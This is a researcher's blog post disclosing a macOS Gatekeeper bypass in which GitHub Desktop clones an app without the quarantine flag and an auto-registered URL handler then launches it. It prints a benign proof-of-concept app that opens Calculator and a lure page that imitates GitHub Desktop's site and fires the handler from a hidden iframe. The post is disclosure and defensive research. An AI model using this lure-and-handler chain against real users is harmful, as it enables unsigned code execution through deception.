<!DOCTYPE html>
<html lang="en">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="author" content="Csaba Fitzl">
    
    

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Few click RCE via GitHub Desktop macOS client with Gatekeeper bypass and custom URL handlers"/>
<meta name="twitter:description" content="TL;DR The GitHub Desktop app doesn’t add the quarantine extended attribute to files downloaded from the web, and this along with macOS’s URL handler auto-registration feature allows an attacker to execute arbitrary, even unsigned code on a macOS system. If we don’t count the clicks required to open the GitHub App, and cloning an external repository, then this is a 2 click RCE.
The idea I recently came across a very good blog post about an RCE vulnerability on GitHub Desktop: GitHub Desktop RCE (OSX) - André Baptista via its custom URL handlers."/>

    <meta property="og:title" content="Few click RCE via GitHub Desktop macOS client with Gatekeeper bypass and custom URL handlers" />
<meta property="og:description" content="TL;DR The GitHub Desktop app doesn’t add the quarantine extended attribute to files downloaded from the web, and this along with macOS’s URL handler auto-registration feature allows an attacker to execute arbitrary, even unsigned code on a macOS system. If we don’t count the clicks required to open the GitHub App, and cloning an external repository, then this is a 2 click RCE.
The idea I recently came across a very good blog post about an RCE vulnerability on GitHub Desktop: GitHub Desktop RCE (OSX) - André Baptista via its custom URL handlers." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://theevilbit.github.io/posts/few_click_rce_via_github_desktop_macos_client_with_gatekeeper_bypass_and_custom_url_handlers/" />
<meta property="article:published_time" content="2019-10-05T00:00:00&#43;00:00"/>
<meta property="article:modified_time" content="2019-10-05T00:00:00&#43;00:00"/>


    
      <base href="https://theevilbit.github.io/posts/few_click_rce_via_github_desktop_macos_client_with_gatekeeper_bypass_and_custom_url_handlers/">
    
    <title>
  Few click RCE via GitHub Desktop macOS client with Gatekeeper bypass and custom URL handlers · theevilbit blog
</title>

    
      <link rel="canonical" href="https://theevilbit.github.io/posts/few_click_rce_via_github_desktop_macos_client_with_gatekeeper_bypass_and_custom_url_handlers/">
    

    <link href="https://fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather:300,700%7CSource+Code+Pro:400,700" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css" integrity="sha256-l85OmPOjvil/SOvVt3HnSSjzF1TUMyT9eV0c2BzEGzU=" crossorigin="anonymous" />

    
      
      
      <link rel="stylesheet" href="https://theevilbit.github.io/css/coder.min.28d751104f30c16da1aa1bb04015cbe662cacfe0d1b01af4f2240ad58580069c.css" integrity="sha256-KNdREE8wwW2hqhuwQBXL5mLKz&#43;DRsBr08iQK1YWABpw=" crossorigin="anonymous" media="screen" />
    

    

    

    

    
    
    <link rel="icon" type="image/png" href="https://theevilbit.github.io/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="https://theevilbit.github.io/images/favicon-16x16.png" sizes="16x16">

    <meta name="generator" content="Hugo 0.54.0" />
  </head>

  <body class=" ">
    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="https://theevilbit.github.io/">
      theevilbit blog
    </a>
    <input type="checkbox" id="menu-toggle" />
    <label class="menu-button float-right" for="menu-toggle"><i class="fas fa-bars"></i></label>
    <ul class="navigation-list">
      
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/categories/">Categories</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/posts/">Posts</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/tags/">Tags</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/about/">About</a>
          </li>
        
      
      
    </ul>
  </section>
</nav>


      <div class="content">
        
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">Few click RCE via GitHub Desktop macOS client with Gatekeeper bypass and custom URL handlers</h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fas fa-calendar"></i>
              <time datetime='2019-10-05T00:00:00Z'>
                October 5, 2019
              </time>
            </span>
            <span class="reading-time">
              <i class="fas fa-clock"></i>
              6 minutes read
            </span>
          </div>
          <div class="categories">
  <i class="fas fa-folder"></i>
    <a href="https://theevilbit.github.io/categories/blog/">BLOG</a></div>

          <div class="tags">
  <i class="fas fa-tag"></i>
    <a href="https://theevilbit.github.io/tags/macos/">macos</a>
      <span class="separator">•</span>
    <a href="https://theevilbit.github.io/tags/gatekeeper/">gatekeeper</a></div>

        </div>
      </header>

      <div>
        

<h2 id="tl-dr">TL;DR</h2>

<p>The GitHub Desktop app doesn’t add the quarantine extended attribute to files downloaded from the web, and this along with macOS’s URL handler auto-registration feature allows an attacker to execute arbitrary, even unsigned code on a macOS system. If we don’t count the clicks required to open the GitHub App, and cloning an external repository, then this is a 2 click RCE.</p>

<h2 id="the-idea">The idea</h2>

<p>I recently came across a very good blog post about an RCE vulnerability on GitHub Desktop: <a href="https://pwning.re/2018/12/04/github-desktop-rce/">GitHub Desktop RCE (OSX) - André Baptista</a> via its custom URL handlers. Although it’s fixed, there was a sentence that caught my attention:</p>

<blockquote>
<p>First, I thought that OSX would be able to detect that this app was downloaded from the Internet. Since the app is cloned through Git the OS will not prompt the user to confirm this action.</p>
</blockquote>

<p>This is a clear indication that GitHub Desktop doesn’t add the quarantine flag to the downloaded content and thus GateKeeper never comes into play. I quickly went ahead and verified it, and indeed it was missing even in the latest version.</p>

<p>The other idea that immediately popped up in my mind is what if the app I clone contains custom URL handlers? That could be auto-registered, and we could gain a few click RCE. But let’s not rush that fast.</p>

<h2 id="the-details">The details</h2>

<p>The GitHub Desktop app registers an URL handle upon installation for <code>x-github-client</code>. If someone clicks a link on a website pointing to such an URL, the browser will open GitHub Desktop. The user gets a prompt to allow opening the application, unless previously it was ticked to always allow running the app. If we provide the <code>openRepo</code> action for this handler, and then a URL after, if will offer us cloning the repository to our local drive. The full link would look like this: <code>x-github-client://openRepo/url-of-the-repository-to-be-cloned</code>. This is standard, expected behaviour.</p>

<p>When the user clicks <code>Clone</code> on the window, the repository will be cloned, and the files will miss the <code>quarantine</code> extended attribute, which is required for GateKeeper to be triggered on file execution. I made a very simple application, available from here (including source code): <a href="https://github.com/theevilbit/githubpoc">GitHub - theevilbit/githubpoc</a> It’s unsigned, and if we download it normally via the browser (Download ZIP), we will see GateKeeper popping up, denying execution.</p>

<p>Before we move on, we need to talk about macOS’s URL handler auto registration. I will just make a brief summary here, but for full details you can read Patrick Wardle’s blogpost on the subject: <a href="https://objective-see.com/blog/blog_0x38.html">Remote Mac Exploitation Via Custom URL Schemes</a> or his recent VirusBulletin 2019 talk about Windtail malware: <a href="https://speakerdeck.com/patrickwardle/cyber-espionage-in-the-middle-east-unravelling-osx-dot-windtail">Cyber-Espionage in the Middle East: Unravelling OSX.WindTail - Speaker Deck</a>.
In short upon download of the application launch services daemon (<code>lsd</code>) will automatically parse the <code>Info.plist</code> file of the application bundle, and if it has an URL handler defined, it will auto-register it (thank you Apple!). In a few seconds later, the handler is ready to be used. This is a macOS feature, and GitHub Desktop has nothing to do with it. But combining the missing quarantine flag, and this allows a very convenient unsigned remote code execution, completely bypassing GateKeeper.</p>

<h2 id="putting-it-together">Putting it together</h2>

<ol>
<li>An attacker creates a Git repository hosting his evil application, which has a custom URL handle defined</li>
<li>An attacker creates a website, with a link to invoke GitHub Desktop to clone the app</li>
<li>The user has to acknowledge to run the GitHub Desktop app, and click clone</li>
<li>Once cloning is done, <code>lsd</code> will parse the app and register the URL handle</li>
<li>The attacker can use the same website to try to invoke his/her application.</li>
</ol>

<h3 id="poc">POC</h3>

<p>As noted above, I created an app, which will launch Calculator, and do nothing else, the URL handler it will use is <code>evilapp://</code> its source is very simple:</p>
<div class="highlight"><pre style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-objectivec" data-lang="objectivec"><span style="color:#09f;font-style:italic">//
</span><span style="color:#09f;font-style:italic">//  AppDelegate.m
</span><span style="color:#09f;font-style:italic">//  Github Desktop
</span><span style="color:#09f;font-style:italic">//
</span><span style="color:#09f;font-style:italic">//  Created by Csaba Fitzl on 2019. 09. 26..
</span><span style="color:#09f;font-style:italic">//  Copyright © 2019. Csaba Fitzl. All rights reserved.
</span><span style="color:#09f;font-style:italic">//
</span><span style="color:#09f;font-style:italic"></span>
<span style="color:#099">#import &#34;AppDelegate.h&#34;
</span><span style="color:#099"></span>
<span style="color:#069;font-weight:bold">@interface</span> <span style="color:#0a8;font-weight:bold">AppDelegate</span> ()

<span style="color:#069;font-weight:bold">@property</span> (<span style="color:#069;font-weight:bold">weak</span>) <span style="color:#078;font-weight:bold">IBOutlet</span> NSWindow <span style="color:#555">*</span>window;
<span style="color:#069;font-weight:bold">@end</span>

<span style="color:#069;font-weight:bold">@implementation</span> <span style="color:#0a8;font-weight:bold">AppDelegate</span>

- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">applicationDidFinishLaunching:</span>(NSNotification <span style="color:#555">*</span>)<span style="color:#033">aNotification</span> {
    <span style="color:#09f;font-style:italic">// Insert code here to initialize your application
</span><span style="color:#09f;font-style:italic"></span>    <span style="color:#078;font-weight:bold">int</span> pid <span style="color:#555">=</span> [[NSProcessInfo processInfo] processIdentifier];
    NSPipe <span style="color:#555">*</span>pipe <span style="color:#555">=</span> [NSPipe pipe];
    NSFileHandle <span style="color:#555">*</span>file <span style="color:#555">=</span> pipe.fileHandleForReading;

    NSTask <span style="color:#555">*</span>task <span style="color:#555">=</span> [[NSTask alloc] init];
    task.launchPath <span style="color:#555">=</span> <span style="color:#c30">@&#34;/usr/bin/open&#34;</span>;
    task.arguments <span style="color:#555">=</span> @[<span style="color:#c30">@&#34;/Applications/Calculator.app&#34;</span>];
    task.standardOutput <span style="color:#555">=</span> pipe;

    [task launch];
}


- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">applicationWillTerminate:</span>(NSNotification <span style="color:#555">*</span>)<span style="color:#033">aNotification</span> {
    <span style="color:#09f;font-style:italic">// Insert code here to tear down your application
</span><span style="color:#09f;font-style:italic"></span>}


<span style="color:#069;font-weight:bold">@end</span></code></pre></div>
<p>The compiled application is hosted here, along with the full Xcode project: <a href="https://github.com/theevilbit/githubpoc">GitHub - theevilbit/githubpoc</a> The name of the app is <code>Github Desktop</code> (lower case ‘h’!). The reason for this is when it’s triggered the user will see a popup saying that the page wants to execute <code>Github Desktop.app</code>, this will lower the victim suspicion, as it’s something expected, and more likely to click.</p>

<p>I created a simple HTML page that has a link to this repo, and it also has a JavaScript, which will add an <code>iframe</code> to the page’s DOM, with a link to <code>evilapp://</code>to trigger the downloaded application, the page will be refreshed every 10 seconds. The page source is:</p>
<div class="highlight"><pre style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#099">&lt;!doctype html&gt;</span>
&lt;<span style="color:#309;font-weight:bold">html</span> <span style="color:#309">lang</span><span style="color:#555">=</span><span style="color:#c30">&#34;en&#34;</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;windows&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">head</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">meta</span> <span style="color:#309">charset</span><span style="color:#555">=</span><span style="color:#c30">&#34;utf-8&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">meta</span> <span style="color:#309">http-equiv</span><span style="color:#555">=</span><span style="color:#c30">&#34;X-UA-Compatible&#34;</span> <span style="color:#309">content</span><span style="color:#555">=</span><span style="color:#c30">&#34;IE=edge,chrome=1&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">meta</span> <span style="color:#309">http-equiv</span><span style="color:#555">=</span><span style="color:#c30">&#34;content-language&#34;</span> <span style="color:#309">content</span><span style="color:#555">=</span><span style="color:#c30">&#34;en-gb&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">meta</span> <span style="color:#309">name</span><span style="color:#555">=</span><span style="color:#c30">&#34;viewport&#34;</span> <span style="color:#309">content</span><span style="color:#555">=</span><span style="color:#c30">&#34;width=device-width, initial-scale=1, maximum-scale=1&#34;</span>&gt;

  &lt;<span style="color:#309;font-weight:bold">link</span> <span style="color:#309">rel</span><span style="color:#555">=</span><span style="color:#c30">&#34;stylesheet&#34;</span> <span style="color:#309">type</span><span style="color:#555">=</span><span style="color:#c30">&#34;text/css&#34;</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">https://desktop.github.com/styles.css?71851157c0a6bd58db329a7827172c59506c6083</span>&gt;

  &lt;<span style="color:#309;font-weight:bold">link</span> <span style="color:#309">rel</span><span style="color:#555">=</span><span style="color:#c30">&#34;icon&#34;</span> <span style="color:#309">sizes</span><span style="color:#555">=</span><span style="color:#c30">&#34;any&#34;</span> <span style="color:#309">mask</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">&#34;https://assets-cdn.github.com/pinned-octocat.svg&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">link</span> <span style="color:#309">rel</span><span style="color:#555">=</span><span style="color:#c30">&#34;icon&#34;</span> <span style="color:#309">type</span><span style="color:#555">=</span><span style="color:#c30">&#34;image/x-icon&#34;</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">&#34;https://assets-cdn.github.com/favicon.ico&#34;</span>&gt;

  &lt;<span style="color:#309;font-weight:bold">script</span> <span style="color:#309">src</span><span style="color:#555">=</span><span style="color:#c30">&#34;https://desktop.github.com/javascript/os.js&#34;</span> <span style="color:#309">charset</span><span style="color:#555">=</span><span style="color:#c30">&#34;utf-8&#34;</span>&gt;&lt;/<span style="color:#309;font-weight:bold">script</span>&gt;

&lt;<span style="color:#309;font-weight:bold">title</span>&gt;GitHub Desktop | Simple collaboration from your desktop&lt;/<span style="color:#309;font-weight:bold">title</span>&gt;

&lt;<span style="color:#309;font-weight:bold">script</span> <span style="color:#309">type</span><span style="color:#555">=</span><span style="color:#c30">&#39;text/javascript&#39;</span>&gt;


<span style="color:#366">window</span>.onload <span style="color:#555">=</span> <span style="color:#069;font-weight:bold">function</span>() {
    <span style="color:#069;font-weight:bold">var</span> iframe <span style="color:#555">=</span> <span style="color:#366">document</span>.createElement(<span style="color:#c30">&#39;iframe&#39;</span>);
    iframe.style.display <span style="color:#555">=</span> <span style="color:#c30">&#34;none&#34;</span>;
    iframe.src <span style="color:#555">=</span> <span style="color:#c30">&#34;evilapp://hahahah&#34;</span>;
    <span style="color:#366">document</span>.body.appendChild(iframe);
	setTimeout(<span style="color:#069;font-weight:bold">function</span>(){  <span style="color:#366">window</span>.location.reload(<span style="color:#f60">1</span>);}, <span style="color:#f60">10000</span>);};
&lt;/<span style="color:#309;font-weight:bold">script</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">head</span>&gt;

  &lt;<span style="color:#309;font-weight:bold">body</span>&gt;
    &lt;<span style="color:#309;font-weight:bold">header</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">div</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;container-new py-6 px-3 text-center&#34;</span>&gt;
    &lt;<span style="color:#309;font-weight:bold">a</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">&#34;/&#34;</span>&gt;
      &lt;<span style="color:#309;font-weight:bold">img</span> <span style="color:#309">src</span><span style="color:#555">=</span><span style="color:#c30">&#34;https://desktop.github.com/images/desktop-icon.svg&#34;</span> <span style="color:#309">alt</span><span style="color:#555">=</span><span style="color:#c30">&#34;GitHub Desktop&#34;</span> <span style="color:#309">width</span><span style="color:#555">=</span><span style="color:#c30">&#34;96&#34;</span> <span style="color:#309">height</span><span style="color:#555">=</span><span style="color:#c30">&#34;96&#34;</span>&gt;
    &lt;/<span style="color:#309;font-weight:bold">a</span>&gt;
    &lt;<span style="color:#309;font-weight:bold">ul</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;nav list-style-none d-flex flex-justify-center f4&#34;</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">ul</span>&gt;

  &lt;/<span style="color:#309;font-weight:bold">div</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">header</span>&gt;

    &lt;<span style="color:#309;font-weight:bold">div</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;hero text-center&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">div</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;container-new px-3&#34;</span>&gt;
    &lt;<span style="color:#309;font-weight:bold">div</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;pb-6&#34;</span>&gt;
      &lt;<span style="color:#309;font-weight:bold">h1</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;f00-light text-white&#34;</span>&gt;
        Totally Legit App
      &lt;/<span style="color:#309;font-weight:bold">h1</span>&gt;
      &lt;<span style="color:#309;font-weight:bold">p</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;col-md-8 mx-auto mb-4 f3-light&#34;</span>&gt;
        Already using GitHub Desktop? Amazing!&lt;<span style="color:#309;font-weight:bold">br</span>&gt;
        Let&#39;s get you started! Click to clone the repository.
      &lt;/<span style="color:#309;font-weight:bold">p</span>&gt;
      &lt;<span style="color:#309;font-weight:bold">a</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;mx-1 my-3 f3 btn btn-large btn-desktop-purple&#34;</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">&#34;x-github-client://openRepo/https://github.com/theevilbit/githubpoc&#34;</span>&gt;Clone&lt;/<span style="color:#309;font-weight:bold">a</span>&gt;
      
      &lt;<span style="color:#309;font-weight:bold">p</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;mb-0&#34;</span>&gt;
        New user? Download GitHub Desktop &lt;<span style="color:#309;font-weight:bold">a</span> <span style="color:#309">href</span><span style="color:#555">=</span><span style="color:#c30">&#34;https://desktop.github.com&#34;</span> <span style="color:#309">target</span><span style="color:#555">=</span><span style="color:#c30">&#34;_blank&#34;</span>&gt;here&lt;/<span style="color:#309;font-weight:bold">a</span>&gt;
      &lt;/<span style="color:#309;font-weight:bold">p</span>&gt;
    &lt;/<span style="color:#309;font-weight:bold">div</span>&gt;

    
  &lt;/<span style="color:#309;font-weight:bold">div</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">div</span>&gt;

<span style="color:#09f;font-style:italic">&lt;!-- Features --&gt;</span>


&lt;<span style="color:#309;font-weight:bold">footer</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;mb-6 px-3 text-gray text-center alt-text-small&#34;</span>&gt;
  &lt;<span style="color:#309;font-weight:bold">p</span> <span style="color:#309">class</span><span style="color:#555">=</span><span style="color:#c30">&#34;copyright&#34;</span>&gt;© 2019 GitHub, Inc. All rights reserved.&lt;/<span style="color:#309;font-weight:bold">p</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">footer</span>&gt;

  &lt;/<span style="color:#309;font-weight:bold">body</span>&gt;
&lt;/<span style="color:#309;font-weight:bold">html</span>&gt;</code></pre></div>
<p>It’s hosted here, if you want to try it:
<a href="https://theevilbit.github.io/hidden/githubpoc.html">https://theevilbit.github.io/hidden/githubpoc.html</a></p>

<p>I made a video showing the entire chain in action:
<center><video style="max-width: 100%; border: 1px solid #e5e5e5; border-radius: 4px;" controls="" src="https://theevilbit.github.io/videos/Few_click_RCE_via_GitHub_Desktop_macOS_client_with_Gatekeeper_bypass_and_custom_URL_handlers/evilapp_via_github_desktop_2.mov"></video></center></p>

<p>To show the extended attributes of a file, run:</p>

<pre><code>$ xattr -l ~/Documents/DEV/GitHub/githubpoc/Github\ Desktop.app/Contents/MacOS/Github\ Desktop
</code></pre>

<p>To clear a registered URL handle run:</p>

<pre><code>$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -u [full path to the application]
</code></pre>

<p>I reported this to GiHub via H1 but they said that it’s unlikely user interaction so they won’t deal with it, so I decided to blog about it. IMO, it’s not that unlikely.</p>

      </div>

      <footer>
        


        
      </footer>
    </article>

    
  </section>

      </div>

      <footer class="footer">
  <section class="container">
    
     © 2020
    
       · 
      Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
    
    
  </section>
</footer>

    </main>

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-151008930-1', 'auto');
	
	ga('send', 'pageview');
}
</script>


  </body>

</html>
